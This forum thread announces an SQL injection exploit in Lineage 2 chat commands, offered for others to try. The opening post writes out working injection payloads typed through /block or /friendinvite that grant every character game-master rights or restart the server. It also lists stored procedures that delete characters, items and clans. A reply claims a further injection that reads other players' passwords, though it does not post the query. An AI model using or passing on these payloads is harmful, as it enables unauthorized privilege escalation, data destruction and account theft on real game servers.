Jump to content

-===New Exploit (Mini SQL Injection)===-


KarmaLog

Recommended Posts

There is a new exploit found.A mini SQL Injection in Lineage's 2 Chat!

 

 

 

:!: :!: **CAUTION,TRY AT YOUR OWN RISK** :!: :!:

 

 

 

In chat type these commands:

 

 

 

 

 

13jq1.jpg

 

 

 

--------------------------

 

Edit by Maxtor:

 

/block 'UPDATE user_data SET builder = 1 WHERE char_id > 0''--

 

(After restart all players will become GMs)

 

/block 'RESTART--

 

--------------------------

 

 

 

If /block doesnt work, try /friendinvite.

 

 

 

 

 

Some Procedures are:

 

lin_DeleteChar

 

lin_DeleteItem

 

lin_DeletePet

 

lin_DeletePledge

 

Lin_EnchantItem

 

lin_GetBuilderAccount

 

LIN_MakeNewBlankItem

 

And many may more!!

 

 

 

Merry Christmas!!

Link to comment
Share on other sites

Someone should check if there are some other commands in chat that work(in bnb server).Artec allready patched /block and said in another forum that he checked the other commands and had no effect...........

Link to comment
Share on other sites

i made a query to see another ppls passwords..

 

u need only account id (using l2logger) account name n right table..

 

 

 

Right commands : /dismiss , /invite , /allyinvite (targeting the victim u want to steal) , /friendelete

 

 

 

P.S I will NOT post it inpublic.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.



×
×
  • Create New...